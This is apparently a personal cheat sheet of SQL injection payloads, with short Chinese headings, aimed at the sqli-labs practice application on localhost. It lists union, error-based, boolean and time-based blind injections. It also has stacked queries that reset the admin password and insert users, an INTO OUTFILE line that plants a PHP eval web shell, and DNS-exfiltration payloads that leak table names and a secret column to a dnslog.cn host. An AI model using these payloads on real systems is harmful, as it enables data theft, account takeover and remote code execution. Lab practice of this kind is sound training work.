网址
?id=10'union select 1,database(),3 -- qwe
updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
union select 1,"<?php eval($_REQUEST[8])?>",3 into outfile "D://phpstudy_pro//WWW//sqli-labs-master//Less-7//1.php"-- a
?id=1' and (length(database()))=8 -- qwe
?id=1' and (ascii(substr(database(),1,1)))=115-- qwe
?id=1' and if (length(database())=8,sleep(5),1) -- qwe
修改 1';update security.users set password='123456' where username="admin"#
插入 ?id=-1 ;insert into users(id,username,password)values(100,'213','123123');
抓包 'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or'
' and 1=1 or '1'='1
dns盲注注入 :
and (select load_file(concat('//',(database()),'.DNS/abc'))) #
and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema= 'challenges' ),'.clde5o.dnslog.cn/abc'))) #
and (select load_file(concat('//',(select column_name from information_schema.columns where table_name= 'f5depwb17g' limit 2,1),'.clde5o.dnslog.cn/abc'))) #
and (select load_file(concat('//',(select secret_3Q8Q from f5depwb17g),'.clde5o.dnslog.cn/abc'))) #
网页
admin ' or 1=1 #
admin' or (length(database()))=8 #
admin' or if (length(database())=8,sleep(5),1) #
'or updatexml(1,concat(0x7e,(select database()),0x7e),1) #
'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or'
http://127.0.0.1/sqli-labs-master/Less-54/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= 'challenges' -- a
http://127.0.0.1/sqli-labs-master/Less-54/?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name= '775r48h6e8' -- a